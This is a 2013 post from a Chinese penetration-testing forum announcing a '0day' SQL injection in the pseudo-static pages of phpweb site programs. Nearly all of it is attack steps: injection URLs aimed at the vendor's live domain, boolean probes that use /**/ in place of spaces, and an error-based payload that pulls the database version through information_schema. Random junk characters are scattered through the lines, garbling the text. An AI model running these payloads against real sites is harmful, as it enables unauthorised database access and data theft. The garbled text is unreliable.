找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpweb伪静态页面注入0day
返回列表 发新帖
查看: 3236|回复: 0
打印 上一主题 下一主题

phpweb伪静态页面注入0day

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-4 19:46:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
phpweb所有的整站程序伪静态页面都存在sql注入' F, s1 M% \, M5 c' n$ J

- \. g+ m+ j/ m5 h$ l主站:http://phpweb.net/
, o. T/ d- Y3 ?% W加’检测:4 K8 A9 j9 L* y6 P$ l8 f- A

% \# X; h; K$ {$ Ihttp://www.phpweb.net/down/html/?772′.html  i7 y4 i& r; J; v6 J" _
  J9 a& s: @; F/ P/ q1 C$ S( w
出错
8 G) @4 f, E' Z: J! k' h" F存在注入。/ j" k1 `& \6 M: C
不能用空格,只能用/*罗+ r% V. s$ N0 H6 u: }/ y: q" a; ]; s
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常. }( X% u; G) c! J4 S

, ?' @; \. l( H8 \! r5 v+ k* o3 V1 dhttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.0 q: r! f3 @6 |" B+ Y8 r
爆数据库版本:; W( n+ m0 P3 K7 Q, C
5 h# k  m4 |% l
?
: n" _" S! V) s- }9 u  P1
  A; \1 {  m  A/ x' ?http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html) V2 k" C6 N! H% G6 u. v  m
更新日期: 2013-01-03 13:39:50        2 H% i3 Y9 k2 L/ Y% e- `+ R
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表